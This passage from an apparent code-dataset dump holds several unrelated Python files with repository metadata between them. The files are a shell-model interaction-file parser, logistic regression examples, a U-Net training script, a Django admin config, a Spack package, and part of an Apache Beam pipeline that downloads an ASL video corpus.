    :param rp_regex: regex matching the rp element
    :return: (emax, hw, b, rp) tuple of ints/None
    """
    felts = filename_elts_list(filename, split_char)
    emax = _e_from_felts(felts, e_regex)
    hw = _hw_from_felts(felts, hw_regex)
    base = _base_from_felts(felts, b_regex)
    rp = _rp_from_felts(felts, rp_regex)
    return emax, hw, base, rp
# ............................................................
# File content parsing
# ............................................................
# todo: Some of this could be done a lot better
def index_lines(commnt_lines, index_comment=CMNT_INDEX):
    """Return the trailing comment lines that map orbital indices to
    quantum numbers.

    The index key is assumed to sit at the end of the comment section,
    immediately after a line beginning with *index_comment*.

    :param commnt_lines: sequence of commented-out lines
    :param index_comment: marker that opens the index -> orbital key
    :return: list of the lines after the marker (falls back to the last
        line when no marker is present, mirroring the original slicing)
    """
    lines = list(commnt_lines)
    start_index = -1
    for position, line in enumerate(lines):
        if line.startswith(index_comment):
            start_index = position + 1
            break
    return lines[start_index:]
def zero_body_term_line(cmnt_lines, zbt_comment=CMNT_ZBT):
    """Find the comment line that states the zero body term.

    Lines are scanned from the bottom up; the first (i.e. last-in-file)
    line starting with *zbt_comment* wins.

    :param cmnt_lines: lines that are comments in the data file
    :param zbt_comment: flag marking the zero body term line
    :return: the zero body term line as a string, or None if absent
    """
    for line in reversed(list(cmnt_lines)):
        if line.startswith(zbt_comment):
            return line
    return None
def zero_body_term(zbt_line):
    """Parse the zero body term value out of its comment line.

    :param zbt_line: line of the form '<label>: <float>', or None
    :return: float value, or None when no line was found
    """
    if zbt_line is None:
        return None
    return float(zbt_line.split(':')[1].strip())
def spe_list(lines, spe_line_pos=ROW_SPE):
    """Split the SPE header line into its whitespace-separated tokens.

    :param lines: non-empty, non-comment content lines
    :param spe_line_pos: position of the SPE line within *lines*
    :return: list of string tokens from the SPE line
    """
    return lines[spe_line_pos].split()
def tbme_data_array(lines, interaction_start=ROW_SPE + 1):
    """Split the TBME interaction lines into an array of token lists.

    :param lines: file content lines (non-empty, non-commented)
    :param interaction_start: index of the first TBME line within *lines*
    :return: list of lists of string tokens, one inner list per TBME line
    """
    return [line.split() for line in lines[interaction_start:]]
def orbital_energies(
        spe_line_items_list, start_index=COL_START_ORBITAL,
        num_orbitals=NCOLS_ORBITALS
):
    """Slice the single-particle energies out of the split SPE header line.

    :param spe_line_items_list: tokens of the SPE line
    :param start_index: position of the first SPE token
    :param num_orbitals: number of SPE tokens to take
    :return: list of SPE tokens (still strings)
    """
    stop_index = start_index + num_orbitals
    return spe_line_items_list[start_index:stop_index]
def other_constants(
        spe_line_items_list, start_index=COL_START_ORBITAL,
        num_orbitals=NCOLS_ORBITALS
):
    """Return the header tokens that follow the single-particle energies.

    :param spe_line_items_list: tokens of the SPE line
    :param start_index: position of the first SPE token
    :param num_orbitals: number of SPE tokens to skip over
    :return: list of trailing tokens
    """
    first_extra = start_index + num_orbitals
    return spe_line_items_list[first_extra:]
def orbital_energies_from_filename(filepath):
    """Read the file at *filepath* and return its single-particle energies.

    :param filepath: path to the interaction file
    :return: list of SPE tokens (still strings)
    """
    header_tokens = spe_list(lines=list(content_lines(filepath, CMNT_STR)))
    return orbital_energies(header_tokens)
def other_constants_from_filename(filepath):
    """Read the file at *filepath* and return the header tokens that follow
    the orbital energies.

    :param filepath: path to the interaction file
    :return: list of trailing header tokens
    """
    header_tokens = spe_list(lines=list(content_lines(filepath, CMNT_STR)))
    return other_constants(header_tokens)
# ............................................................
# Map construction
# ............................................................
def index_map(idx_lines):
    """Build a map from orbital index to its quantum-number tuple.

    Each line is whitespace-separated: the first token is the integer
    index, the remaining tokens become the (string) quantum numbers.

    :param idx_lines: lines defining the index -> orbital key
    :return: dict mapping int index -> tuple of string quantum numbers
    """
    mapping = dict()
    for line in idx_lines:
        tokens = line.split()
        mapping[int(tokens[0])] = tuple(tokens[1:])
    return mapping
def index_to_qnums_map(fpath):
    """Map orbital index -> (n, l, j, tz) tuple for the file at *fpath*.

    :param fpath: path to the interaction file
    :return: dict mapping int index -> tuple of quantum-number strings
    """
    cmnts = comment_lines(fpath, CMNT_STR)
    return index_map(index_lines(commnt_lines=cmnts))
def mass_spe_data_map(dpath, filterfn=lambda x: True, fpath_list=None):
    """Build a map: mass number -> orbital energy list.

    :param dpath: directory that is a direct parent of the data files
    :param filterfn: predicate applied to file names before use
    :param fpath_list: explicit file paths; if None, scans the directory
    :return: dict mapping int mass number -> list of SPE tokens
    """
    if fpath_list is None:
        fpath_list = get_files_r(dpath, filterfn)
    result = dict()
    for fpath in fpath_list:
        result[mass_number_from_filename(fpath)] = (
            orbital_energies_from_filename(fpath))
    return result
def mass_to_index_to_energy_map(dpath, filterfn=lambda x: True,
                                fpath_list=None):
    """Build a map: mass number -> (orbital index -> energy).

    Orbital indices are 1-based, matching the file's index key.

    :param fpath_list: explicit file paths; if None, scans the directory
    :param dpath: directory that is a direct parent of the data files
    :param filterfn: predicate applied to file names before use
    :return: dict mapping int mass -> dict of 1-based index -> float energy
    """
    mea_map = mass_spe_data_map(dpath, filterfn, fpath_list)
    for mass in list(mea_map.keys()):
        energies = mea_map[mass]
        mea_map[mass] = {
            pos + 1: float(energies[pos]) for pos in range(len(energies))
        }
    return mea_map
def _mass_tbme_data_map(dpath, filterfn=lambda x: True, fpath_list=None):
    """Map mass number -> raw TBME data array (list of token lists),
    one entry per file.

    :param dpath: directory that is a direct parent of the data files
    :param filterfn: predicate applied to file names before use
    :param fpath_list: explicit file paths; if None, scans the directory
    """
    if fpath_list is None:
        fpath_list = get_files_r(dpath, filterfn)
    mida_map = dict()
    for fpath in fpath_list:
        rows = tbme_data_array(lines=list(content_lines(fpath, CMNT_STR)))
        mida_map[mass_number_from_filename(fpath)] = rows
    return mida_map
def mass_to_tbint_to_energy_map(dpath, filterfn=lambda x: True,
                                fpath_list=None):
    """Build a map: mass number -> (interaction id tuple -> energy).

    The first six tokens of each TBME row identify the interaction; the
    seventh is its energy.

    :param fpath_list: explicit file paths; if None, scans the directory
    :param dpath: directory that is a direct parent of the data files
    :param filterfn: predicate applied to file names before use
    :return: dict mapping int mass -> dict of 6-token tuple -> float energy
    """
    mida_map = _mass_tbme_data_map(dpath, filterfn, fpath_list)
    for mass in list(mida_map.keys()):
        rows = mida_map[mass]
        mida_map[mass] = {tuple(row[0:6]): float(row[6]) for row in rows}
    return mida_map
def mass_to_zbt_map(dpath, filterfn=lambda x: True, fpath_list=None):
    """Build a map: mass number -> zero body term.

    :param dpath: directory that is a direct parent of the data files
    :param filterfn: predicate applied to file names before use
    :param fpath_list: explicit file paths; if None, scans the directory
    :return: dict mapping int mass -> float zero body term (or None)
    """
    if fpath_list is None:
        fpath_list = get_files_r(dpath, filterfn)
    mzbt_map = dict()
    for fpath in fpath_list:
        zbt_line = zero_body_term_line(
            cmnt_lines=comment_lines(fpath, CMNT_STR))
        mzbt_map[mass_number_from_filename(fpath)] = zero_body_term(zbt_line)
    return mzbt_map
def mass_other_constants_map(dpath, filterfn=lambda x: True, fpath_list=None):
    """Build a map: mass number -> header constants after the SPE's.

    :param dpath: main directory containing the data files
    :param filterfn: predicate applied to file names before use
    :param fpath_list: explicit file paths; if None, scans the directory
    :return: dict mapping int mass -> list of trailing header tokens
    """
    if fpath_list is None:
        fpath_list = get_files_r(dpath, filterfn)
    moc_map = dict()
    for fpath in fpath_list:
        moc_map[mass_number_from_filename(fpath)] = (
            other_constants_from_filename(fpath))
    return moc_map
| 38.0375
| 79
| 0.689648
|
1c714f257594d11da3f3823cb431af1b03347fa6
| 4,637
|
py
|
Python
|
LogisticRegression/lr.py
|
Marticles/ml-in-action
|
7b8a13fdd73a210ee4338dce400bd764eb9abf75
|
[
"MIT"
] | null | null | null |
LogisticRegression/lr.py
|
Marticles/ml-in-action
|
7b8a13fdd73a210ee4338dce400bd764eb9abf75
|
[
"MIT"
] | null | null | null |
LogisticRegression/lr.py
|
Marticles/ml-in-action
|
7b8a13fdd73a210ee4338dce400bd764eb9abf75
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
# 《机器学习实战》 - 第5章 - Logistic回归
# 示例1:采用梯度上升法找到Logistic回归分类器的最佳回归系数
def loadDataSet():
    """Load the toy 2-D dataset from 'TestSet.txt'.

    Each line holds two feature values and an integer label, whitespace
    separated.  A constant X0 = 1.0 bias term is prepended to each sample.

    :return: (dataMat, labelMat) -- list of [1.0, x1, x2] rows and the
        matching list of int labels
    """
    dataMat = []
    labelMat = []
    # FIX: use a context manager so the file handle is always closed
    # (the original opened the file and never closed it)
    with open('TestSet.txt') as fr:
        for line in fr.readlines():
            lineArr = line.strip().split()
            dataMat.append([1.0, float(lineArr[0]), float(lineArr[1])])
            labelMat.append(int(lineArr[2]))
    return dataMat, labelMat
def sigmoid(z):
    """Logistic sigmoid 1 / (1 + e^-z); works on scalars and numpy arrays."""
    return 1.0 / (np.exp(-z) + 1)
def gradAscent(dataMatIn, classLabels):
    """Batch gradient ascent for logistic regression.

    :param dataMatIn: 2-D sample data (rows = samples; column 0 is the bias)
    :param classLabels: 0/1 labels, one per sample
    :return: (n, 1) numpy matrix of fitted weights
    """
    features = np.mat(dataMatIn)
    targets = np.mat(classLabels).transpose()  # column vector of labels
    n_features = np.shape(features)[1]
    learning_rate = 0.001
    n_iterations = 500
    weights = np.ones((n_features, 1))
    for _ in range(n_iterations):
        predictions = sigmoid(features * weights)
        residual = targets - predictions
        weights = weights + learning_rate * features.transpose() * residual
    return weights
# 测试结果
# dataArr, labelMat = loadDataSet()
# print(gradAscent(dataArr,labelMat))
def stoGradAscent0(dataMatrix, classLabels):
    """Plain stochastic gradient ascent: a single pass over the samples
    with a fixed learning rate of 0.001.

    :param dataMatrix: 2-D sample data (rows = samples)
    :param classLabels: 0/1 labels, one per sample
    :return: 1-D numpy array of fitted weights
    """
    samples = np.array(dataMatrix)
    n_samples, n_features = np.shape(samples)
    learning_rate = 0.001
    weights = np.ones(n_features)
    for idx in range(n_samples):
        prediction = sigmoid(sum(samples[idx] * weights))
        residual = classLabels[idx] - prediction
        weights = weights + learning_rate * samples[idx] * residual
    return weights
def stocGradAscent1(dataMatrix, classLabels, numIter = 150):
    """Improved stochastic gradient ascent.

    The learning rate decays with both the epoch and step counters (it
    never reaches zero thanks to the +0.0001 floor), and an index is drawn
    at random each step from a shrinking range.

    NOTE(review): the drawn index addresses the full sample array directly
    rather than going through the shrinking `remaining` list -- this
    faithfully mirrors the book's original code; confirm that bias toward
    low-index samples is intended.

    :param dataMatrix: 2-D sample data (rows = samples)
    :param classLabels: 0/1 labels, one per sample
    :param numIter: number of epochs over the data
    :return: 1-D numpy array of fitted weights
    """
    samples = np.array(dataMatrix)
    m, n = np.shape(samples)
    weights = np.ones(n)
    for epoch in range(numIter):
        remaining = list(range(m))
        for step in range(m):
            alpha = 4 / (1.0 + epoch + step) + 0.0001
            pick = int(np.random.uniform(0, len(remaining)))
            residual = classLabels[pick] - sigmoid(sum(samples[pick] * weights))
            weights = weights + alpha * residual * samples[pick]
            del remaining[pick]
    return weights
def plotBestFit(wei):
    """Scatter-plot the dataset and draw the fitted decision boundary.

    :param wei: flat weight vector [w0, w1, w2] (call .getA() first when
        passing a numpy matrix)
    """
    weights = wei
    dataMat, labelMat = loadDataSet()
    dataArr = np.array(dataMat)
    pos_x, pos_y = [], []
    neg_x, neg_y = [], []
    for idx in range(np.shape(dataArr)[0]):
        if int(labelMat[idx]) == 1:
            pos_x.append(dataArr[idx, 1])
            pos_y.append(dataArr[idx, 2])
        else:
            neg_x.append(dataArr[idx, 1])
            neg_y.append(dataArr[idx, 2])
    fig = plt.figure()
    ax = fig.add_subplot(111)
    ax.scatter(pos_x, pos_y, s = 30, marker = 's')
    ax.scatter(neg_x, neg_y, s = 30,)
    # boundary: w0 + w1*x + w2*y = 0  =>  y = -(w0 + w1*x) / w2
    x = np.arange(-3.0, 3.0, 0.1)
    y = (-weights[0] - weights[1] * x) / weights[2]
    ax.plot(x, y, c = 'red')
    plt.xlabel(('X1'))
    plt.ylabel(('Y1'))
    plt.show()
# 可视化
# dataArr, labelMat = loadDataSet()
# plotBestFit(stocGradAscent1(dataArr,labelMat))
# 示例2: 从疝气病症预测病马的死亡率
def classifyVector(inX, weights):
    """Sigmoid classifier: return 1.0 when the logistic response of the
    weighted features exceeds 0.5, else 0.0.

    :param inX: feature vector
    :param weights: fitted weight vector
    """
    return 1.0 if sigmoid(sum(inX * weights)) > 0.5 else 0.0
def colicTest():
    """Train on the horse-colic training file and report test error rate.

    Each tab-separated line carries 21 features followed by a label.
    Weights are fitted with stochastic gradient ascent (500 epochs), then
    the held-out test file is classified.

    :return: fraction of misclassified test samples
    """
    trainingSet = []
    trainingLabels = []
    # FIX: context managers close both data files (the original leaked
    # the handles)
    with open('HorseColicTraining.txt') as frTrain:
        for line in frTrain.readlines():
            currLine = line.strip().split('\t')
            lineArr = [float(currLine[i]) for i in range(21)]
            trainingSet.append(lineArr)
            trainingLabels.append(float(currLine[21]))
    trainWeights = stocGradAscent1(np.array(trainingSet), trainingLabels, 500)
    errorCount = 0
    numTestVec = 0.0
    with open('HorseColicTest.txt') as frTest:
        for line in frTest.readlines():
            numTestVec += 1.0
            currLine = line.strip().split('\t')
            lineArr = [float(currLine[i]) for i in range(21)]
            if int(classifyVector(np.array(lineArr), trainWeights)) != int(currLine[21]):
                errorCount += 1
    errorRate = (float(errorCount) / numTestVec)
    print("the error rate of this test is: %f" % errorRate)
    return errorRate
def multiTest():
    """Run colicTest() ten times and print the mean error rate."""
    numTests = 10
    total = sum(colicTest() for _ in range(numTests))
    print("after %d iterations the average error rate is: %f"
          % (numTests, total / float(numTests)))
# 测试结果
# multiTest()
| 26.346591
| 101
| 0.586586
|
d9c57904cabc15c081975c093dd3d77c32947bfd
| 2,456
|
py
|
Python
|
segmentation/train/trainTorch.py
|
enjoy-the-science/brain-texts
|
2f90cff6b7efd610791b278579c62ba802eb0f02
|
[
"MIT"
] | null | null | null |
segmentation/train/trainTorch.py
|
enjoy-the-science/brain-texts
|
2f90cff6b7efd610791b278579c62ba802eb0f02
|
[
"MIT"
] | null | null | null |
segmentation/train/trainTorch.py
|
enjoy-the-science/brain-texts
|
2f90cff6b7efd610791b278579c62ba802eb0f02
|
[
"MIT"
] | null | null | null |
from segmentation.model.Unet224Torch import Unet224Torch
from segmentation.utils.ARDataset import ARDataset
from segmentation.utils.metrics import JaccardBCELoss, jaccard_metric
from segmentation.train.TrainerTorchUNET224 import TrainerTorchUNET224
from segmentation.utils.utils import split_train_test_data
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
import argparse
def arguments():
    """Build and parse the command-line options for training.

    :return: argparse.Namespace with input, checkpoints, lr, dice_weight,
        batch_size, epochs and valid_size attributes
    """
    parser = argparse.ArgumentParser()
    add = parser.add_argument
    add("-i", "--input", type=str,
        help="Path to folder with patients")
    add("-c", "--checkpoints", type=str,
        help="Path to checkpoints folder")
    add("-l", "--lr", type=float, default=0.001,
        help="Learning rate. Default: 0.001")
    add("-d", "--dice_weight", type=float, default=0.8,
        help="Dice weight in error. Between 0 and 1. Default: 0.8")
    add("-bs", "--batch_size", type=int, default=4,
        help="Batch size. Default: 4")
    add("-e", "--epochs", type=int, default=10,
        help="Count of epochs. Default: 10")
    add("-vs", "--valid_size", type=float, default=0.2,
        help="Part of data for validation. Default: 0.2")
    return parser.parse_args()
def main(opt):
    """Wire up datasets, model, loss and optimizer, then run training.

    :param opt: parsed CLI options (see arguments())
    """
    data_path = opt.input
    checkpoint_path = opt.checkpoints
    validation_size = opt.valid_size
    dice_weight = opt.dice_weight
    lr = float(opt.lr)
    batch_size = int(opt.batch_size)
    epochs = int(opt.epochs)
    # split patients into train/validation and wrap them in loaders
    train, val = split_train_test_data(path=data_path,
                                       validation_size=validation_size)
    train_loader = DataLoader(ARDataset(train), batch_size=batch_size)
    val_loader = DataLoader(ARDataset(val), batch_size=batch_size)
    model = Unet224Torch(1)
    criterion = JaccardBCELoss(dice_weight)
    metric = jaccard_metric  # kept for parity with the original script
    optimizer = optim.Adam(model.parameters(), lr=lr)
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    # prefix identifies this run's checkpoints by its hyperparameters
    prefix = "lr=%s_bs=%s_dice=%s" % (lr, batch_size, dice_weight)
    trainer = TrainerTorchUNET224(model, train_loader, val_loader,
                                  checkpoint_path, criterion, optimizer,
                                  prefix, device, epochs)
    trainer.train_model()
if __name__ == '__main__':
    # CLI entry point: parse options and launch training.
    main(arguments())
| 36.656716
| 129
| 0.680782
|
b850a2ecf85ab9f6353814effa2c4add66ffc821
| 695
|
py
|
Python
|
api/admin.py
|
chikjib/Django-Rest-Api
|
5abeee768fe5e69ea474034c583388728745524c
|
[
"MIT"
] | null | null | null |
api/admin.py
|
chikjib/Django-Rest-Api
|
5abeee768fe5e69ea474034c583388728745524c
|
[
"MIT"
] | null | null | null |
api/admin.py
|
chikjib/Django-Rest-Api
|
5abeee768fe5e69ea474034c583388728745524c
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Post, Category, Comment
# from django.contrib.auth.admin import UserAdmin
class PostAdmin(admin.ModelAdmin):
    # Admin config for Post: show title/body/image columns in the changelist
    # and auto-fill the slug from the title while typing.
    list_display = ('title', 'body', 'featured_image')
    prepopulated_fields = {'slug': ('title',)}
class CategoryAdmin(admin.ModelAdmin):
    # Admin config for Category: show the name and auto-fill slug from it.
    list_display = ('name',)
    prepopulated_fields = {'slug': ('name',)}
class CommentAdmin(admin.ModelAdmin):
    # Admin config for Comment: surface author, contact and timestamp columns.
    list_display = ('author_name', 'email', 'comment_body', 'created_at',)
# Attach the customized admin classes to their models.
admin.site.register(Post, PostAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Comment, CommentAdmin)
# admin.site.register(CustomUser,UserAdmin)
| 28.958333
| 75
| 0.710791
|
bea7851fb60d4ec9b5ce36f83df8a16ef4e1cc2a
| 328
|
py
|
Python
|
covid19yemen/config/docs.py
|
alkuhlani/covid19yemen
|
7703b548a18479998b40da65f00c3f5035b77d91
|
[
"MIT"
] | null | null | null |
covid19yemen/config/docs.py
|
alkuhlani/covid19yemen
|
7703b548a18479998b40da65f00c3f5035b77d91
|
[
"MIT"
] | null | null | null |
covid19yemen/config/docs.py
|
alkuhlani/covid19yemen
|
7703b548a18479998b40da65f00c3f5035b77d91
|
[
"MIT"
] | null | null | null |
"""
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/covid19yemen"
# docs_base_url = "https://[org_name].github.io/covid19yemen"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
    """Docs-page hook: inject the brand text shown in the generated docs header."""
    brand = "covid19yemen"
    setattr(context, "brand_html", brand)
| 27.333333
| 68
| 0.734756
|
754adeffecd2ac37c1e4d822b9e25cd1aae41971
| 117
|
py
|
Python
|
main/request/reset_password.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | null | null | null |
main/request/reset_password.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | null | null | null |
main/request/reset_password.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | null | null | null |
from pydantic import BaseModel, EmailStr
class ResetPassword(BaseModel):
    """Request body for the password-reset endpoint."""
    # pydantic validates this is a syntactically correct e-mail address.
    email: EmailStr
    # Plain-text replacement password; hashing presumably happens downstream — TODO confirm.
    new_password: str
| 16.714286
| 40
| 0.769231
|
2d4d3ccbc174ef1c1bc8577f6931b8afc6deaa85
| 3,470
|
py
|
Python
|
var/spack/repos/builtin/packages/minigmg/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 3
|
2021-09-29T02:14:40.000Z
|
2022-01-27T20:50:36.000Z
|
var/spack/repos/builtin/packages/minigmg/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2022-02-28T11:30:18.000Z
|
2022-03-23T19:34:56.000Z
|
var/spack/repos/builtin/packages/minigmg/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
class Minigmg(Package):
    """miniGMG is a compact benchmark for understanding the performance
    challenges associated with geometric multigrid solvers
    found in applications built from AMR MG frameworks
    like CHOMBO or BoxLib when running
    on modern multi- and manycore-based supercomputers.
    It includes both productive reference examples as well as
    highly-optimized implementations for CPUs and GPUs.
    It is sufficiently general that it has been used to evaluate
    a broad range of research topics including PGAS programming models
    and algorithmic tradeoffs inherit in multigrid. miniGMG was developed
    under the CACHE Joint Math-CS Institute.
    Note, miniGMG code has been supersceded by HPGMG. """

    homepage = "http://crd.lbl.gov/departments/computer-science/PAR/research/previous-projects/miniGMG/"
    url = "https://crd.lbl.gov/assets/Uploads/FTG/Projects/miniGMG/miniGMG.tar.gz"

    version('master', sha256='1c2d27496a881f655f5e849d6a7a132625e535739f82575991c511cc2cf899ac')

    # Exactly one vectorisation backend is compiled in (multi=False).
    variant('vec', default='ompif', description='Which method of vectorisation to use',
            values=('ompif', 'sse', 'avx', 'simde'), multi=False)
    variant('opt', default=False, description='Enable optimization flags for improved OpenMP')

    depends_on('mpi')
    # Set up SIMD Everywhere config
    depends_on('simde', when='vec=simde')
    patch('simde.patch', when='vec=simde')
    # Patch to add timer for Aarch64 rather than rdtsc
    patch('aarch64_time.patch', when='target=aarch64:')
    # Replaces inline with inline static, for correct syntax
    patch('inline_static.patch')

    phases = ['build', 'install']

    def build(self, spec, prefix):
        # miniGMG has no build system; compile everything in a single
        # mpicc invocation whose flags are assembled below.
        cc = Executable(spec['mpi'].mpicc)
        args = []
        # Default optimisation level
        if spec.satisfies('+opt'):
            # nvhpc does not accept -Ofast; use its -fast equivalent.
            if self.spec.satisfies('%nvhpc'):
                args.append('-fast')
            else:
                args.append('-Ofast')
        else:
            args.append('-O3')
        # Add OpenMP flag
        args += [self.compiler.openmp_flag]
        args += ['miniGMG.c', 'mg.c', 'box.c', 'solver.c']
        # Set the correct operators file - using the vec variant
        if spec.satisfies('vec=sse'):
            args += ['operators.sse.c']
        elif spec.satisfies('vec=avx'):
            args += ['operators.avx.c']
        elif spec.satisfies('vec=simde'):
            args += ['operators.simde.c']
        else:
            args += ['operators.ompif.c']
        # Switch out timer file (depends on patch)
        if spec.satisfies('target=aarch64:'):
            args += ['timer.aarch64.c']
        else:
            args += ['timer.x86.c']
        args += ['-D__MPI']
        # +opt trades the collaborative-threading tuning for prefetch/fusion defines.
        if spec.satisfies('+opt'):
            args += ['-D__PREFETCH_NEXT_PLANE_FROM_DRAM']
            args += ['-D__FUSION_RESIDUAL_RESTRICTION']
        else:
            args += ['-D__COLLABORATIVE_THREADING=6']
        args += ['-D__TEST_MG_CONVERGENCE', '-D__PRINT_NORM', '-D__USE_BICGSTAB']
        args += ['-o', 'run.miniGMG', '-lm']
        cc(*args)

    def install(self, spec, prefix):
        # Install the single binary plus the bundled job scripts.
        mkdir(prefix.bin)
        install('run.miniGMG', prefix.bin)
        mkdir(prefix.jobs)
        install('job*', prefix.jobs)
| 34.7
| 104
| 0.634006
|
8786e06a5aa7994263f127062fd9ca985eeb1f24
| 225,235
|
py
|
Python
|
api/data_extractor__beam.py
|
sacontreras/fids-capstone-asl-translation
|
4d26b986f06668d979478fcb5af7279ad0fc8fe9
|
[
"W3C",
"DOC",
"Unlicense"
] | 1
|
2021-03-09T23:46:06.000Z
|
2021-03-09T23:46:06.000Z
|
api/data_extractor__beam.py
|
sacontreras/fids-capstone-asl-translation
|
4d26b986f06668d979478fcb5af7279ad0fc8fe9
|
[
"W3C",
"DOC",
"Unlicense"
] | null | null | null |
api/data_extractor__beam.py
|
sacontreras/fids-capstone-asl-translation
|
4d26b986f06668d979478fcb5af7279ad0fc8fe9
|
[
"W3C",
"DOC",
"Unlicense"
] | null | null | null |
from __future__ import absolute_import
import base64
import io
import logging
import os
import random
import re
import sys
import time
import urllib
import zipfile
import apache_beam as beam
# import apache_beam.runners.interactive.interactive_beam as ib
import apache_beam.io.fileio
# from apache_beam.transforms.sql import SqlTransform
import apache_beam.transforms.sql
import cv2
import numpy as np
from apache_beam.io.filesystems import FileSystems, GCSFileSystem
from apache_beam.options.pipeline_options import PipelineOptions
from api import beam__common, data_extractor__common, fidscs_globals, fileio
from api.signstreamxmlparser_refactored.analysis import signstream as ss
from api.beam__common import FIDSCapstonePipelineOptions
# from tensorflow.keras.preprocessing.image import img_to_array, load_img
def prepare_output_str(str, label=""):
    """Return *str* prefixed with "<label>: " when a non-empty label is given."""
    prefix = f"{label}: " if label else ""
    return prefix + str
def boostrap_signstream_corpus(d_corpus_info, d_pl_options, label=""):
    """
    Download and extract the SignStream corpus archive (in memory).

    d_corpus_info MUST be a dict as follows:
        {
            'tmp_dir': fidscs_globals.TMP_DIR,
            'corpus_archive': fidscs_globals.CORPUS_ARCHIVE
        }

    Downloads d_corpus_info['corpus_archive'] from http://secrets.rutgers.edu/dai/xml,
    unzips it in memory, and writes each document listed in
    fidscs_globals.CORPUS_DOC_FILE_PATH_SUFFIXES under d_corpus_info['tmp_dir'].

    Returns a one-element list holding a glob pattern ("<corpus_dir>/*")
    covering the extracted documents.
    """
    print(prepare_output_str(f"CORPUS-INDEX BOOTSTRAP INFO: {d_corpus_info}", label=label))
    # download archive
    """
    requires:
        d_corpus_info['corpus_archive']
        d_corpus_info['tmp_dir']
    """
    corpus_parent_dir = d_corpus_info['tmp_dir']
    corpus_dir = fileio.path_join(corpus_parent_dir, d_corpus_info['corpus_archive'].split('.')[0])
    remote_archive_path = 'http://secrets.rutgers.edu/dai/xml/'+d_corpus_info['corpus_archive']
    local_archive_parent_dir = d_corpus_info['tmp_dir']
    local_archive_path = fileio.path_join(local_archive_parent_dir, d_corpus_info['corpus_archive'])
    # The archive is held entirely in memory; nothing is written to
    # local_archive_path (it is computed but unused here).
    memfile = data_extractor__common.download_to_memfile(remote_archive_path, block_sz=8192, display=False)
    zip_ref = zipfile.ZipFile(memfile, 'r')
    print(f"unzipping {remote_archive_path} in-memory...")
    # zip_ref.printdir()
    if not fileio.dir_path_exists(corpus_dir, d_pl_options)[0]:
        fileio.make_dirs(corpus_dir, d_pl_options)
    # Extract only the known corpus documents, preserving their archive-relative paths.
    for doc_file_path_suffix in fidscs_globals.CORPUS_DOC_FILE_PATH_SUFFIXES:
        bytes_unzipped = zip_ref.read(doc_file_path_suffix)
        with fileio.open_file_write(corpus_parent_dir+'/'+doc_file_path_suffix) as f:
            f.write(bytes_unzipped)
            f.close()
    zip_ref.close()
    memfile.close()
    print(f"\tDONE")
    return [fileio.path_join(corpus_dir,"*")]
class SignstreamCorpusBootstrapper(beam__common.PipelinePcollElementProcessor):
    """Beam element-processor wrapper that runs boostrap_signstream_corpus per element."""

    def __init__(self, d_pl_options, label=""):
        handler_kwargs = {'d_pl_options': d_pl_options, 'label': label}
        super().__init__(
            fn_pcoll_element_processor=boostrap_signstream_corpus,
            kargs=handler_kwargs,
            return_result=True,
        )
def get_video_segment_download_info(vid_index_schemad_pcoll_row, d_pl_options):
    """
    Expand one schemad video-index row into per-segment download descriptors.

    The row's compressed_mov_url field may hold several URLs separated by ';'
    (one per video segment); one dict is produced per URL:
        {
            'target_video_fname':      <row.target_video_filename>,
            'target_video_frames_dir': <stitched-frames dir for this video>,
            'segment_url':             <segment URL>,
            'segment_fname':           <last path component of the URL>
        }
    """
    fname = vid_index_schemad_pcoll_row.target_video_filename
    frames_root = d_pl_options[fidscs_globals.OPT_NAME_STITCHED_VIDEO_FRAMES_DIR]
    frames_dir = fileio.path_join(frames_root, fname.split('.')[0])
    download_infos = []
    for url in vid_index_schemad_pcoll_row.compressed_mov_url.split(';'):
        url_str = str(url)
        download_infos.append({
            'target_video_fname': fname,
            'target_video_frames_dir': frames_dir,
            'segment_url': url_str,
            'segment_fname': url_str.split('/')[-1],
        })
    return download_infos
class VideoSegmentInfoGatherer(beam__common.PipelinePcollElementProcessor):
    """Beam element-processor wrapper dispatching rows to get_video_segment_download_info."""

    def __init__(self, d_pl_options):
        handler_kwargs = {'d_pl_options': d_pl_options}
        super().__init__(
            fn_pcoll_element_processor=get_video_segment_download_info,
            kargs=handler_kwargs,
            return_result=True,
        )
def beam_download_target_video_segment(d_target_vid_seg_download_info, d_pl_options, max_fail=fidscs_globals.DOWNLOAD_MAX_FAIL_COUNT, label=""):
    """
    Download one video segment to the configured video dir, with retries.

    expects d_target_vid_seg_download_info: {'target_video_fname': target_video_fname, 'target_video_frames_dir': target_video_frames_dir, 'segment_url': url, 'segment_fname': url.split('/')[-1]}

    Skips the download when the segment file already exists; otherwise retries
    up to max_fail times, sleeping DOWNLOAD_FAIL_SLEEP_TIME between attempts.
    Returns the input dict (passthrough) so downstream transforms can chain.
    """
    segment_url = d_target_vid_seg_download_info['segment_url']
    segment_fname = d_target_vid_seg_download_info['segment_fname']
    video_dir = d_pl_options[fidscs_globals.OPT_NAME_VIDEO_DIR]
    if not fileio.dir_path_exists(video_dir, d_pl_options)[0]:
        fileio.make_dirs(video_dir, d_pl_options)
    local_segment_path = fileio.path_join(video_dir, segment_fname)
    n_fail = 0
